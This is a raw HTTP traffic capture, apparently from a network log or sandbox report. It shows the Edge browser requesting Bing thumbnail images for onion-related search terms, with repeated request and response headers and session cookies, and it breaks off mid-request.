akamai-grn: 0.2b367a5c.1733306893.404f4000
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 584
cache-control: public, max-age=1036082
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4340
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.e46b2b1f-5664-43a6-b5df-8fbef8bbd8f7&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.e46b2b1f-5664-43a6-b5df-8fbef8bbd8f7&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 398
x-check-cacheable: YES
cache-control: public, max-age=866167
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4341
GET

https://th.bing.com/th?id=ODLS.c0a8be98-ec6f-4769-a8b4-09bb74d966b2&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.c0a8be98-ec6f-4769-a8b4-09bb74d966b2&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 584
cache-control: public, max-age=2156192
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4360
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Onione+PNG&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Onione+PNG&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1346
x-check-cacheable: YES
cache-control: public, max-age=2524230
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4367
GET

https://th.bing.com/th?q=6+Onions&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=6+Onions&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1027
cache-control: public, max-age=303385
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f436d
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Ojon+Tree&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Ojon+Tree&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6853
x-check-cacheable: YES
cache-control: public, max-age=2431158
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4363
GET

https://th.bing.com/th?q=Stuffed+Dough+French+Onions+Dip+Recipe&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Stuffed+Dough+French+Onions+Dip+Recipe&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2564
x-check-cacheable: YES
cache-control: public, max-age=1995769
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4365
GET

https://th.bing.com/th?q=Chicken+and+Onion+Soup+Served+in+a+Onion&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Chicken+and+Onion+Soup+Served+in+a+Onion&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1027
cache-control: public, max-age=1065252
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f436f
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Onjon+Pictyre&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Onjon+Pictyre&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8583
cache-control: public, max-age=5183970
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4345
x-check-cacheable: YES
GET

https://th.bing.com/th?q=Onjon+Da&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Onjon+Da&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
